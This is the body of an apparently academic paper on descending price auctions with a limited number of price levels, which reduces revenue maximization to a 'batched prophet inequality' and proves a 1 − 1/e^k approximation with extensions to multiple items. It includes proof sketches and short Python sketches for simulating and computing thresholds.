We consider a symmetric single-parameter Bayesian mechanism design setting, in which an auctioneer is selling one or multiple units of the same item to n unit-demand buyers (represented by the set N = {1, 2, . . . , n}) to maximize the expected revenue. We rely on standard definitions, solution concepts, and results in Myerson's theory of optimal single-parameter auction design [Myerson, 1981]; e.g., see Chapter 3 of Hartline [2013]. In particular, we assume buyers' utilities are quasi-linear, meaning that given the value v from receiving the item and a payment p, the buyer's utility is v − p. We assume buyers' private values v = (v_1, v_2, . . . , v_n) for the item are non-negative and drawn i.i.d. from a known common prior distribution with a cumulative distribution function (CDF) G : R_{≥0} → [0, 1], and this distribution admits a probability density function (PDF) g. For simplicity of technical exposition, we further assume this distribution is atom-less and hence G is continuous. Given a buyer's value distribution, the Myerson virtual value function is defined as φ_G(v) ≜ v − (1 − G(v))/g(v). We restrict our attention to regular distributions, for which the virtual value function is weakly increasing. The auctioneer is interested in running a k-level descending price auction (k-DPA) to maximize her expected revenue. This auction, formally defined below, is basically a descending price (clock) auction where the price levels, and therefore the bids of the buyers, are restricted to a finite set of cardinality k.
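Before the formal definition, here is a concrete instance of the virtual-value objects just introduced: for the Uniform[0, 1] prior we have G(v) = v and g(v) = 1, so φ_G(v) = 2v − 1, which is increasing (hence the distribution is regular), and φ_G^{-1}(0) = 1/2 is the Myerson reserve. A small sketch of this standard worked example:

```python
# Virtual values for the Uniform[0,1] prior (standard worked example).
def G(v): return v                            # CDF on [0, 1]
def g(v): return 1.0                          # PDF
def phi(v): return v - (1.0 - G(v)) / g(v)    # Myerson virtual value: 2v - 1

rho = 0.5                                     # phi^{-1}(0), the Myerson reserve
for v in (0.25, 0.5, 0.75, 1.0):
    print(f"v = {v:.2f} -> phi(v) = {phi(v):+.2f}")
```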
Definition 1 (k-DPA). Given a finite set of distinct price levels (also referred to as bids) P = {p_1, p_2, . . . , p_k}, where p_1 > p_2 > . . . > p_k, its corresponding m-unit k-descending price auction for m ∈ N is the following mechanism:
• Ask each buyer i to place a bid b_i ∈ P ∪ {0} after observing her private value v_i ∼ G (bidding b_i = 0 is always a possibility, which guarantees the individual rationality of our auctions),
• Select the set of winners by greedily picking the top m submitted bids (breaking ties uniformly at random),
• Charge each buyer i in the winner set her submitted bid b_i.
As a remark, k-DPA with k = 1 is basically an anonymous pricing mechanism with a randomized tie-breaking rule. Also, when k = +∞ and P = [p, +∞), this auction boils down to the ordinary descending price auction with an anonymous reserve price of p. In this case, by setting p = φ_G^{-1}(0), we can recover Myerson's optimal auction.
Importantly, an alternative interpretation of the above mechanism is basically a sequential pricing when the buyers are flexible to decide on their purchase round: in such a setting, n i.i.d.
buyers arrive at round 0 and the seller posts a (decreasing) sequence of prices p = (p 1 , . . . , p k ) to sell m items over a finite horizon of k discrete rounds 1, . . . , k. Now each buyer i, given her value v i , decides when to purchase the item (if any). The game starts at round 1.
At each round j ∈ [k], if all the units of the item have not been sold so far, the buyers who have decided to purchase at price p_j have a chance to receive one unit of the item at this price (with ties broken uniformly at random if there is more than one buyer interested in the last unit of the item). If there are still some unsold units of the item at the end of this round, the game advances to the next round j + 1. In this alternative interpretation of our setting, the buyers only interact with the auctioneer (in at most k rounds) and do not observe the number of sold items. This assumption is particularly relevant for settings in which the buyers and the auctioneer privately/remotely interact with each other.
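Anticipating the threshold form of the equilibrium established in Section 2.3 (a buyer accepts the round-j price iff her value lies in [τ_j, τ_{j−1})), the sequential-pricing view can be simulated directly. The prices and thresholds below are illustrative numbers only, not an equilibrium-consistent pair:

```python
import random

def run_k_dpa(prices, thresholds, values, m):
    """Simulate the k-round sequential sale for m units; ties broken at random.
    A buyer with value v accepts the round-j price iff tau_j <= v < tau_{j-1}."""
    sold, revenue, prev_tau = 0, 0.0, float("inf")
    for p, tau in zip(prices, thresholds):    # decreasing prices and thresholds
        takers = [v for v in values if tau <= v < prev_tau]
        random.shuffle(takers)
        winners = takers[: m - sold]          # losers of the tie-break drop out
        revenue += p * len(winners)
        sold += len(winners)
        if sold == m:
            break
        prev_tau = tau
    return revenue

vals = [random.random() for _ in range(10)]   # 10 i.i.d. Uniform[0,1] values
print(run_k_dpa(prices=[0.7, 0.5, 0.3], thresholds=[0.8, 0.6, 0.4],
                values=vals, m=2))
```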
Auctioneer's Problem
The auctioneer's objective is to maximize her expected revenue by choosing the price sequence p 1 > . . . > p k , taking into account the buyers' strategies at equilibrium. In particular, once prices are fixed, the buyers play a game of incomplete information, in which each buyer's strategy is a bid function that maps her private value to one of the possible prices (or a distribution over the possible prices for mixed strategies). We evaluate the expected revenue of the resulting k-DPA under a Bayes-Nash equilibrium (BNE) of this game. The equilibrium selection (and uniqueness) will be detailed later in Section 2.3.
Given the realized values v, by abuse of notation, we denote by REV-ALG_G(v, p) the revenue of the k-DPA with prices p at a particular BNE when buyers' values are drawn i.i.d. from a common prior distribution G. We also introduce the corresponding notation for the revenue of the optimal direct mechanism when buyers' values are drawn i.i.d. from a common prior distribution G. From Myerson [1981], the optimal mechanism maximizes the virtual welfare for regular distributions. In particular, when m = 1, as a benchmark, we are interested in studying the worst-case revenue approximation ratio Γ(k) of the best k-DPA against this benchmark. Given the auctioneer's objective, our main goal is to establish a lower bound on Γ(k), ideally through a simple and interpretable sequence of bid levels/prices, and to study how fast the expected revenue of the best k-DPA converges to Myerson's optimal revenue. We start our analysis by considering a seller with a single unit of the item (hence m = 1) and extend the results to a setting with multiple units in Section 4.
The Buyers' Bayes-Nash Equilibrium Characterization
Considering k-DPA with i.i.d. buyers as a symmetric game of incomplete information, in the same spirit as the ordinary descending price auction with i.i.d. buyers, we focus our attention on Bayes-Nash equilibria in which buyers use symmetric strategies; this means a buyer's strategy depends on her valuation, not on her identity. Therefore, the symmetric BNE strategy can be represented by a single bidding function b* : R_{≥0} → P that maps each realized value v to one of the possible prices in P. Note that our restriction to symmetric BNE is really not a restriction: k-DPA belongs to the class of symmetric rank-based auctions studied in Chawla and Hartline [2013]. As established in that paper, when buyers' values are i.i.d., any auction in this class has a unique Bayes-Nash equilibrium. Moreover, this equilibrium is symmetric. We next characterize this unique symmetric BNE strategy b*(v).
Given the decreasing sequence of prices p 1 > . . . > p k as possible price levels, a buyer with realized value v chooses an optimal stopping round j (if any) along this sequence by bidding the price p j corresponding to that round, taking as given the strategies of other buyers (at the equilibrium).
As a result, in the sequential pricing interpretation of k-DPA, such a buyer rejects all prices p j ′ for j ′ < j and accepts the price p j . If the item is unsold before round j, a uniform random buyer among those who have accepted price p j wins the item.
First, intuitively speaking, higher-valuation buyers are more anxious to purchase than lower-valuation buyers, and hence buyers with higher valuations accept earlier. As a result, b*(v) should have the form of a monotone increasing step function with discontinuities at certain thresholds τ_1 ≥ τ_2 ≥ . . . ≥ τ_k > 0, and hence the buyers' equilibrium can be represented by this sequence of thresholds. Second, we can actually provide an explicit relationship between the sequence of prices p = (p_1, . . . , p_k) and the sequence of equilibrium thresholds τ = (τ_1, . . . , τ_k), which gives us our desired characterization of the symmetric BNE.
Proposition 1. Fix a value distribution G. For any given sequence of strictly decreasing prices p, there exists a sequence of thresholds +∞ ≜ τ_0 > τ_1 ≥ τ_2 ≥ . . . ≥ τ_k > 0 such that: (i) the symmetric Bayes-Nash equilibrium b* for the buyers is to bid p_j (or equivalently stop at the price of round j) if their valuation is in [τ_j, τ_{j−1}) for j ∈ [k], and to bid 0 (or equivalently never stop at any price) if their valuation is smaller than τ_k; (ii) we have τ_k = p_k and the thresholds τ_1, . . . , τ_{k−1} satisfy the indifference conditions in Eq. (3). We defer the proof of Proposition 1 to Appendix A. We highlight that Eq. (3) is the indifference condition for a buyer with value τ_j: if she purchases at price p_j, the left-hand side is her expected utility, and if she purchases at price p_{j+1}, the right-hand side is her expected utility. Also, if a buyer with value v chooses a stopping round j, then we should have v ≥ p_j to guarantee her individual rationality. Given our equilibrium characterization above, this property automatically holds as τ_j ≥ p_j for all j ∈ [k]. The proof is simple and based on backward induction: for j = k this is true as τ_k = p_k. Now assume τ_{j+1} ≥ p_{j+1}. Then the right-hand side of Eq. (3) is non-negative as τ_j ≥ τ_{j+1} ≥ p_{j+1}. Therefore τ_j ≥ p_j, completing the proof of the inductive step.
Given a value distribution G, our characterization defines a mapping Γ_G : R^k_{≥0} → R^k_{≥0} that maps any sequence of strictly decreasing prices p to a sequence of (weakly) decreasing equilibrium thresholds τ, or equivalently maps a sequence of k distinct prices p_1 > . . . > p_k to a sequence of k′ ≤ k distinct equilibrium thresholds τ_1 > . . . > τ_{k′}. We next show that Γ_G has an inverse, denoted by Γ_G^{-1}, which helps us translate equilibrium thresholds to prices. We postpone the proof of Proposition 2 to Appendix A.
Proposition 2. For any sequence of k strictly decreasing thresholds τ, there exists a sequence of k strictly decreasing prices p = Γ_G^{-1}(τ) such that the corresponding buyers' symmetric Bayes-Nash equilibrium is determined by the thresholds τ.
Equipped with Propositions 1 and 2, the auctioneer can directly work with the sequence of equilibrium thresholds instead of the sequence of prices in the revenue maximization problem.
Based on this idea, we next reformulate the auctioneer's problem in terms of an alternative problem which we call batched prophet inequality.
Reduction to "Batched Prophet Inequality"
We start this section by defining the following variant of the basic prophet inequality problem [Samuel-Cahn, 1984], which is intimately connected to our analysis of the k-DPA.
Definition 2 (Batched Prophet Inequality). Consider a decision-maker maximizing her expected reward in a sequential game with k rounds. Before the beginning of the game, the decision-maker picks k thresholds τ_1 > τ_2 > . . . > τ_k. Then n rewards V_1, . . . , V_n are drawn independently from a distribution F (known by the decision-maker). The game then starts from round 1. At each round i, if all the rewards are below threshold τ_i, the game advances to the next round i + 1. Otherwise, the decision-maker wins one of the rewards that pass threshold τ_i, chosen uniformly at random, and the game ends. If no reward passes any of the thresholds by the end of round k, the game ends with the decision-maker winning zero reward.
If the decision-maker knows the reward realizations, the expected optimal reward is OPT ≜ E[max{max_{i∈[n]} V_i, 0}]. Note that the V_i's are allowed to be negative, but the decision-maker always has the option of rejecting any negative rewards by choosing τ_k ≥ 0. We are interested in designing thresholds τ to maximize the ratio of the expected reward of the decision-maker, denoted by ALG(τ_1, . . . , τ_k), to the offline benchmark OPT. This ratio, ALG(τ_1, . . . , τ_k)/OPT, is known as the competitive ratio.

To make a connection between the problem of maximizing the competitive ratio in the batched prophet inequality setting and the revenue approximation ratio of k-DPA versus Myerson's optimal mechanism (defined in Eq. (2)), we rely on two key observations:
• We evaluate the expected revenue of our k-DPA at its symmetric BNE. As a result, we can rely on Myerson's payment/revenue equivalence lemma [Myerson, 1981] to simplify our analysis: for regular distributions, the expected revenue of k-DPA is equal to the expected virtual value of the winner.
• Suppose the auctioneer selects a sequence of equilibrium thresholds τ̃_1 > . . . > τ̃_k (as in Proposition 1), which can always be induced by a sequence of prices p_1 > . . . > p_k, where p = Γ_G^{-1}(τ̃) (as in Proposition 2). Then we can simulate the winner-selection process of k-DPA by finding the first round j in which one of the buyers v_1, . . . , v_n passes threshold τ̃_j, and picking one such buyer uniformly at random.
Now consider an instance of the batched prophet inequality where V_i = φ_G(v_i) and the thresholds are τ_j = φ_G(τ̃_j) for j ∈ [k]; the two winner-selection processes then coincide. This simply holds as φ_G is increasing due to regularity. Note that φ_G(τ̃_k) = τ_k > 0, and hence no buyer with a negative virtual value can ever be a winner in the resulting k-DPA. Now, the offline benchmark of the batched prophet inequality is the same as the expected revenue of Myerson's optimal auction. The final step is translating the thresholds τ̃_i = φ_G^{-1}(τ_i) to prices. This can be done using Proposition 2, which results in p = Γ_G^{-1}([τ̃_i]_{i∈[k]}). Putting all the pieces together, the revenue approximation of the k-DPA with prices p is equal to the competitive ratio of the thresholds τ picked by the decision-maker in the above batched prophet inequality instance.
We end this section by showing how the problem of finding optimal sequence of thresholds in batched prophet inequality can be reformulated as a simple dynamic programming.
Dynamic Programming: Initially the decision-maker only knows the prior distribution of the rewards and nothing more about their realizations. Yet, the decision-maker knows that when the game reaches round j, her information about the reward distribution is going to change. In particular, if round j has arrived and no reward has been collected, then the decision-maker knows all the rewards are smaller than τ_{j−1}, and her posterior belief about the rewards changes to the conditional CDF F(v)/F(τ_{j−1}) over the support [0, τ_{j−1}). Therefore, the state of the system at any round is the remaining number of rounds and the current upper bound on the distribution of rewards (i.e., the lowest threshold so far). We denote by Ψ(t, θ) the optimal expected reward if t rounds are remaining and all the rewards are known to be smaller than θ. The following is the Bellman update equation for computing the optimal expected reward starting from state (t, θ):

Ψ(t, θ) = max_{θ′ ≤ θ} { (1 − (F(θ′)/F(θ))^n) · E[V | θ′ ≤ V < θ] + (F(θ′)/F(θ))^n · Ψ(t − 1, θ′) },   (5)

where V ∼ F. We note that once a threshold θ′ is picked at state (t, θ), if the set of rewards S ⊆ [n] passing θ′ is non-empty, then the conditional expected collected reward is equal to E[V | θ′ ≤ V < θ], which is used in the term corresponding to the instantaneous reward in Eq. (5). The recursion in Eq. (5) highlights the tradeoff that the decision-maker is facing: by increasing θ′, the probability of collecting an instantaneous reward (i.e., 1 − (F(θ′)/F(θ))^n) decreases, while the probability of reaching future rounds (i.e., (F(θ′)/F(θ))^n) and the expected future reward (i.e., Ψ(t − 1, θ′)) increase.
Given the above formulation, the optimal expected reward obtained by k thresholds (and the thresholds themselves) can be evaluated by computing Ψ(k, ∞) recursively. However, it is not clear how well these thresholds can approximate the optimum offline reward OPT as a benchmark.
We address this question in the next section.
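For intuition, this dynamic program is easy to run on a grid; below is a minimal discretized sketch for F = Uniform[0, 1], using the recursion (5) above (the grid resolution and parameters are illustrative choices):

```python
import numpy as np

# Discretized Bellman recursion (5) for F = Uniform[0,1]:
# state (t, theta) = t rounds left, all rewards known to lie below theta.
n, k = 10, 5
grid = np.linspace(1e-6, 1.0, 401)     # candidate thresholds / upper bounds

psi = np.zeros_like(grid)              # Psi(0, theta) = 0
for t in range(1, k + 1):
    new_psi = np.zeros_like(grid)
    for i, theta in enumerate(grid):
        best = 0.0
        for j in range(i + 1):         # try thresholds theta' <= theta
            tp = grid[j]
            p_stop = 1.0 - (tp / theta) ** n        # some reward passes theta'
            cond_mean = 0.5 * (tp + theta)          # E[V | tp <= V < theta]
            best = max(best, p_stop * cond_mean + (1 - p_stop) * psi[j])
        new_psi[i] = best
    psi = new_psi

# Psi(k, 1) plays the role of Psi(k, infinity) since the support is [0, 1].
print("Psi(k, 1) ~", round(float(psi[-1]), 4), "  OPT = n/(n+1) =", n / (n + 1))
```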
Batched Prophet Inequality for a Single Item
In this section, we focus on the single-item batched prophet inequality problem (Definition 2). We first introduce a simple sequence of thresholds that geometrically span the quantile space (Section 3.1), and show that they provide a competitive ratio against OPT, as a function of k, that converges to 1 exponentially fast (Section 3.2). We further show how to use this result to design price sequences/bid levels in a k-DPA to obtain approximations to revenue and welfare (Section 3.3). As neither the decision-maker nor the offline benchmark ever accepts a negative reward, we assume w.l.o.g. that all values in the support of F are non-negative in Sections 3.1 and 3.2. We revisit this subtle point in Section 3.3 when we design our final prices (as virtual values can be negative).
Approximations Using Balanced Thresholds
As the main result of this section, we establish that there exists a sequence of k thresholds for the decision-maker that achieves 1 − 1/e^k of the optimum offline reward OPT in the batched prophet inequality problem. Here, we assume rewards are non-negative.
Theorem 1. The sequence of thresholds given by F(τ_j) = 1/e^{j/n} (i.e., τ_j = F^{-1}(1/e^{j/n})) for j = 1, . . . , k achieves 1 − 1/e^k of the optimum offline reward OPT as the expected reward of the decision-maker in the batched prophet inequality problem.

Remark 1. For the special case of k = 1, our problem boils down to designing a static threshold for the i.i.d. prophet inequality problem [Correa et al., 2017] or the prophet secretary problem (with homogeneous buyers). As has been established in prior work, no static policy can obtain a competitive ratio better than 1 − 1/e, and hence our result is tight for k = 1. As we show next, our analysis is also tight for general k.
Warm Up (Uniform Distribution):
Before providing the proof sketch, let us show how the bound 1 − 1/e^k appears in an example with the uniform distribution over [0, 1]. Letting α = 1/e^{1/n}, the thresholds prescribed in Theorem 1 become τ_j = α^j for j = 1, . . . , k.
The expected reward of the decision-maker by using these thresholds becomes

ALG = Σ_{j=1}^{k} (α^{(j−1)n} − α^{jn}) · (α^{j−1} + α^j)/2.   (6)

This is because with probability α^{(j−1)n} − α^{jn} the maximum of the rewards {V_i}_{i∈[n]} falls into the interval [α^j, α^{j−1}). In this case, the game ends by the end of round j, while the expected collected reward conditioned on reaching round j is (α^{j−1} + α^j)/2. We can rewrite (6) as

ALG = ((1 + α)(1 − α^n)/2) Σ_{j=1}^{k} α^{(j−1)(n+1)} = ((1 + α)(1 − 1/e)/2) · (1 − α^{k(n+1)})/(1 − α^{n+1}),   (7)

where the last equality follows by plugging in α = 1/e^{1/n}. The optimum offline reward OPT, on the other hand, is equal to

OPT = E[max_{i∈[n]} V_i] = n/(n + 1).   (8)

We next compare the performance of our thresholds given in (7) to the optimal offline reward given in (8), establishing the 1 − 1/e^k competitive ratio against the optimum offline reward as a benchmark.
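The closed form (6) is easy to check numerically against a direct simulation of the threshold play; a small sketch (n and k below are illustrative choices):

```python
import math, random

n, k = 10, 3
alpha = math.exp(-1.0 / n)                       # alpha = 1/e^(1/n)
tau = [alpha ** j for j in range(1, k + 1)]      # thresholds tau_j = alpha^j

# Closed form (6): sum over the round j in which the maximum falls.
alg_formula = sum((alpha ** ((j - 1) * n) - alpha ** (j * n))
                  * (alpha ** (j - 1) + alpha ** j) / 2
                  for j in range(1, k + 1))

# Direct Monte Carlo of the same policy.
trials, total = 200_000, 0.0
for _ in range(trials):
    v = [random.random() for _ in range(n)]
    for t in tau:
        passing = [x for x in v if x >= t]
        if passing:                              # collect a uniform passing reward
            total += random.choice(passing)
            break

print(f"formula (6) = {alg_formula:.4f}, simulation ~ {total / trials:.4f}")
print(f"OPT = n/(n+1) = {n / (n + 1):.4f}, ratio = {alg_formula * (n + 1) / n:.4f}, "
      f"1 - 1/e^k = {1 - math.exp(-k):.4f}")
```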
Proof Sketch of Theorem 1 for General Distributions
Here, we provide the proof sketch of Theorem 1 and relegate the details to Appendix A. By choosing the first threshold τ_1, we obtain at least a reward of τ_1 if at least one of the random variables is above this threshold. In addition to τ_1, we obtain the difference between the random variable V_i that is selected (if any) and the threshold τ_1, i.e., (V_i − τ_1)^+. There is a chance that this selected random variable is the highest random variable, and by bounding this probability we establish that the expected instantaneous reward, i.e., the expected reward obtained by selecting the first threshold, is at least

(1 − F(τ_1)^n) · τ_1 + P_n(F(τ_1)) · E[(V_max − τ_1)^+],   (9)

where for any x ∈ [0, 1] we define the polynomial P_n(x) as P_n(x) ≜ (1 − x^n)/(n(1 − x)). Equation (9) manifests the first tradeoff that the decision-maker is facing: by selecting a threshold τ_1, she balances the terms τ_1 and E[(V_max − τ_1)^+], which are increasing and decreasing in τ_1, respectively.
To gain some intuition, let us first consider the simpler case of k = 1. If we only had one round, the decision-maker could safely aim to maximize only the instantaneous reward (as there are no future rounds). To this end, the optimal threshold should make both coefficients (1 − F(τ_1)^n) and P_n(F(τ_1)) large. We show that it is possible to have

min{1 − F(τ_1)^n, P_n(F(τ_1))} ≥ 1 − 1/e.   (11)

In particular, for F(τ_1) = 1 − 1/n the above inequality holds. We can then use the fact that τ + Σ_{i=1}^{n} E[(V_i − τ)^+] ≥ OPT for any τ, establishing the 1 − 1/e competitive ratio for k = 1. In fact, this result is closely related to the well-known Bernoulli selection lemma (see Correa et al. [2017]) and online contention resolution schemes for i.i.d. variables under random order (see Yan [2011], Lee and Singla [2018]). These techniques also lead to the well-known result that there exists a static threshold for the i.i.d. prophet inequality problem that obtains the approximation ratio 1 − 1/e, and our analysis for this special case provides an alternative proof of it.
However, we are interested to approximate the expected reward for any k ≥ 1 number of rounds, where the decision-maker is allowed to use k different thresholds. Here, the decisionmaker not only should try to keep the instantaneous reward high, she should also hedge against the future and have an eye on the expected reward of future rounds.
To guide the analysis, let us consider the expected reward of the second round. With probability F(τ_1)^n, all random variables are below τ_1 and we get to the second round. The stage-reward of the second round is the same as that of the first round after replacing the distribution F(x) with F(x)/F(τ_1), which is the distribution of V_i conditioned on V_i < τ_1. We can write

ALG(τ_1, . . . , τ_k) ≥ (1 − F(τ_1)^n) τ_1 + P_n(F(τ_1)) E[(V_max − τ_1)^+] + F(τ_1)^n · (the expected reward of the remaining k − 1 rounds under the conditional distribution).   (12)

Equation (12) manifests the second tradeoff that the decision-maker is facing: by choosing τ_1 she needs to make min{1 − F(τ_1)^n, P_n(F(τ_1))} large, but crucially she needs to make the term F(τ_1)^n large enough at the same time. We next show in the following lemma that it is possible to satisfy (11) while having F(τ_1)^n ≥ 1/e.

Lemma 1. For the threshold τ with F(τ) = 1/e^{1/n}, we have min{1 − F(τ)^n, P_n(F(τ))} ≥ 1 − 1/e and F(τ)^n = 1/e.

We postpone its proof to Appendix A. Using Lemma 1 (applied round by round), we can further bound (12) from below by (1 − 1/e^k) OPT, which again uses the fact that τ + Σ_{i=1}^{n} E[(V_i − τ)^+] ≥ OPT for any τ, completing the proof.
The Price Trajectories for Revenue and Welfare Approximations
Theorem 1 finds an approximately optimal sequence of k distinct thresholds in the batched prophet inequality setting. Using the reduction of Section 2.4, we can determine the equilibrium thresholds of our final k-level descending price auction, as well as the set of k distinct prices/bid levels supporting this equilibrium. The only subtle difference is that V_i = φ_G(v_i) can take negative values when v_i < ρ ≜ φ_G^{-1}(0). However, neither the decision-maker nor the optimal offline benchmark should accept any negative V_i (which is equivalent to allocating to a buyer with negative virtual value). We handle this subtlety by focusing on the subset of buyers for which v_i ≥ ρ, and constructing our thresholds by invoking Theorem 1 for the distribution of V_i conditioned on v_i ≥ ρ. We summarize our procedure for constructing these prices in Algorithm 1.
Algorithm 1: Price construction of k-DPA for approximating the optimal revenue
Input: number of distinct prices k ∈ N, buyers' (regular) value distribution G
Output: sequence of prices p_1 > p_2 > . . . > p_k
Define ρ ≜ φ_G^{-1}(0) and α ≜ 1/e^{1/n}.
For j = 1, . . . , k: set the equilibrium threshold τ̃_j = G^{-1}((1 − G(ρ)) α^j + G(ρ)).
Return the prices p = Γ_G^{-1}(τ̃) supporting these equilibrium thresholds (via Proposition 2 and Eq. (3)).

Theorem 2. The k-level descending price auction for selling a single item to i.i.d. buyers, with prices constructed by Algorithm 1, achieves an expected revenue no less than 1 − 1/e^k of the optimal revenue. We defer the proof of Theorem 2 to Appendix A.
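As a concrete run of Algorithm 1, the following sketch computes the equilibrium thresholds for the Uniform[0, 1] prior (where φ_G(v) = 2v − 1 and ρ = 1/2); the supporting prices then follow from Proposition 2 and Eq. (3). The parameters n and k are illustrative:

```python
import math

# Equilibrium thresholds of Algorithm 1 for G = Uniform[0,1]: G(rho) = rho = 1/2.
n, k = 10, 5
rho = 0.5                                   # phi^{-1}(0) for Uniform[0,1]
alpha = math.exp(-1.0 / n)                  # alpha = 1/e^(1/n)

taus = []
for j in range(1, k + 1):
    q = (1.0 - rho) * alpha ** j + rho      # G(tau~_j) = (1 - G(rho)) alpha^j + G(rho)
    taus.append(q)                          # G^{-1}(q) = q for Uniform[0,1]

print("equilibrium thresholds:", [round(t, 4) for t in taus])
```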
Remark 2. So far the focus of our paper has been on maximizing the expected virtual welfare, which is equivalent to maximizing the expected revenue. However, the same approach can help us find a sequence of prices so that the expected value of the winner of the k-DPA approximates the expected maximum social welfare. To this end, we only need to define an instance of the batched prophet inequality problem where V_i = v_i, and then use the thresholds τ of Theorem 1 as equilibrium thresholds (assuming V_i ∼ G). Combining Proposition 2 and Equation (3) with the fact that G(τ_j) = 1/e^{j/n} for j = 1, . . . , k results in a sequence of prices p satisfying:

p_j = (1/e^{j/n}) (1 − 1/e^{(n−1)/n}) + (1/e^{(n−1)/n}) p_{j+1} for j = 1, . . . , k − 1,

with the initialization p_k = G^{-1}(1/e^{k/n}). The proof is similar to (and somewhat simpler than) that of Theorem 2 and is omitted for brevity.

Figure 1: The sequence of prices and the corresponding thresholds that determine the equilibrium for the uniform distribution over [0, 1], n = 10 buyers, and k = 5 rounds: (a) the prices and the corresponding thresholds that determine the buyers' equilibrium for approximating welfare, and (b) the prices and the corresponding thresholds that determine the buyers' equilibrium for approximating revenue.
We observe that in the last round the price and the equilibrium threshold coincide, but in any of the earlier rounds the buyers purchase only when their value is larger than a threshold which is strictly larger than the price. This is because of the competition among buyers: by waiting, or equivalently settling for a lower price in the auction, a buyer faces a lower price, but the competition among buyers increases and the chances of acquiring the item decrease.
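The welfare trajectory of Remark 2 can be reproduced directly; the following sketch computes the prices and thresholds for the setting of Figure 1 (Uniform[0, 1], n = 10, k = 5), and indeed the last price equals the last threshold:

```python
import math

# Welfare-approximating prices from Remark 2 for G = Uniform[0,1], n = 10, k = 5.
n, k = 10, 5
beta = math.exp(-(n - 1) / n)               # 1/e^((n-1)/n)

p = [0.0] * (k + 1)
p[k] = math.exp(-k / n)                     # p_k = G^{-1}(1/e^{k/n}) = e^{-k/n}
for j in range(k - 1, 0, -1):               # backward recursion of Remark 2
    p[j] = math.exp(-j / n) * (1 - beta) + beta * p[j + 1]

thresholds = [math.exp(-j / n) for j in range(1, k + 1)]   # G(tau_j) = e^{-j/n}
print("prices     :", [round(x, 4) for x in p[1:]])
print("thresholds :", [round(t, 4) for t in thresholds])
```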
Extension to Multiple Items
So far we considered a setting in which the seller has a single item. In this section, we extend our results to a setting with m ≥ 2 identical items and n unit-demand buyers.
The environment
As in our base model, the seller announces a sequence of k prices and the buyers simultaneously decide the price at which they accept to purchase the item. Similar to the baseline model, for any descending sequence of prices p, there exists a sequence of thresholds τ_1 ≥ τ_2 ≥ . . . ≥ τ_k > 0 that characterizes the buyers' equilibrium:

Proposition 3. Fix a value distribution G. For any given sequence of strictly decreasing prices p, there exists a sequence of thresholds +∞ ≜ τ_0 > τ_1 ≥ τ_2 ≥ . . . ≥ τ_k > 0 such that the symmetric Bayes-Nash equilibrium b* for the buyers is to bid p_j (or equivalently stop at the price of round j) if their valuation is in [τ_j, τ_{j−1}) for j ∈ [k], and to bid 0 (or equivalently never stop at any price) if their valuation is smaller than τ_k.
This proposition is the analogue of Proposition 1 for multiple items. In the proof of this proposition, given in the appendix, we also provide an explicit characterization of the equilibrium thresholds in terms of the sequence of prices.
Batched Prophet Inequality for Multiple Items
Similar to our baseline analysis for a single item, if the decision-maker knows the reward realizations, the expected optimal reward becomes

OPT_m = E[max_{ℓ∈{0,1,...,m}} Σ_{i=1}^{ℓ} V_(i)],

where V_(i) is the i-th top value and, by convention, for ℓ = 0 the reward is zero. This expression is the expectation of the total reward when the decision-maker can take up to m rewards. We are interested in designing thresholds τ to maximize the ratio of the expected reward of the decision-maker, denoted by ALG_m(τ_1, . . . , τ_k), to the offline benchmark OPT_m; that is, the competitive ratio ALG_m(τ_1, . . . , τ_k)/OPT_m.
Approximations Using Balanced Thresholds for Multiple Items
In this section, we devise a sequence of k thresholds for the decision-maker and establish its approximation of the optimum offline reward OPT m in the batched prophet inequality problem with m > 1 items.
Theorem 3. For any m ≥ 2 items, k ≥ 1 rounds, and ǫ > 0, there exists N(ǫ) such that, for n ≥ N(ǫ), the constructed sequence of k thresholds achieves the stated closed-form fraction of the optimum offline reward OPT_m as the expected reward of a decision-maker that can acquire up to m rewards in the batched prophet inequality.
In the rest of this subsection, we provide the proof of this theorem.
For any τ, we let S^+(τ) ≜ Σ_{i=1}^{m} E[(V_(i) − τ)^+], where V_(i) is the i-th top random variable. We also define the polynomials A(n, m, x) and B(n, m, x), the multi-unit analogues of the coefficients appearing in (9). Using these notations, we can write the expected welfare as

mτ_1 A(n, m, F(τ_1)) + S^+(τ_1) B(n, m, F(τ_1)) + . . .   (15)
where (a) follows from the following argument: for any r ∈ {2, . . . , k}, the relevant coefficients on the two sides agree because both sides equal the probability of having i_r many values above τ_r.
Given that mτ_r + S^+(τ_r) ≥ OPT_m for all r = 1, . . . , k, and similarly to the proof of Theorem 1, we need to choose the sequence of thresholds (i) to maximize the coefficients min{A(n, m, F(τ_r)), B(n, m, F(τ_r))}, and (ii) to make sure that C(n, i_r) (1 − F(τ_r))^{i_r} F(τ_r)^{n−i_r} is large enough. In the next lemma (Lemma 2) we establish the existence of thresholds that achieve both goals; moreover, for any ǫ > 0, there exists N(ǫ) such that the corresponding bounds hold for n ≥ N(ǫ). We defer the proof of this lemma to the appendix and continue with the proof of Theorem 3 by using this lemma.
We next lower bound the expression in (15). First note an auxiliary inequality, (16), that holds for all r ∈ {1, . . . , m}. Using Lemma 2 and (16), we obtain the desired lower bound. This completes the proof.
We conclude this section by noting that Theorem 3 covers the result of Arnosti and Ma [2021], which establishes the 1 − e^{-m} m^m/m! approximation for a single threshold using a more involved proof technique than our analysis.
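For reference, the single-threshold (k = 1) benchmark 1 − e^{-m} m^m/m! evaluates as follows for small m (illustrative arithmetic only):

```python
import math

# The k = 1 bound 1 - e^{-m} m^m / m! of Yan [2011] / Arnosti and Ma [2021].
for m in range(1, 6):
    gap = math.exp(-m) * m ** m / math.factorial(m)
    print(f"m = {m}:  1 - e^-m m^m/m! = {1 - gap:.4f}")
```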
Conclusion
Motivated by applications where the auctioneer aims to have fewer rounds of communication with the buyers, we consider the descending price auction with a bounded number of price levels.
As our main result, we establish how well it can approximate the optimal revenue. In our problem formulation, an auctioneer with m identical items posts k prices, and then multiple unit-demand buyers with i.i.d. values decide about their bids. To guide the analysis, we introduce a new variant of the prophet inequality, called the batched prophet inequality, in which the decision-maker decides about k (decreasing) thresholds and then sequentially collects rewards (up to m) that are above the thresholds, with ties broken uniformly at random. This variant of the classic prophet inequality is of independent interest, but we prove that the auctioneer's problem with a bounded number of prices reduces to the batched prophet inequality and then turn our attention to finding policies for the batched prophet inequality with optimal competitive ratio. For a single item, we establish the existence of a policy for the batched prophet inequality that achieves 1 − 1/e^k of the optimum. Therefore, by increasing k, the revenue of a properly designed descending price auction with k price levels converges exponentially fast to the optimal revenue. We then extend our analysis of the batched prophet inequality, and therefore of the descending price auction with k bids, to a setting with multiple items.
Proof of Proposition 1
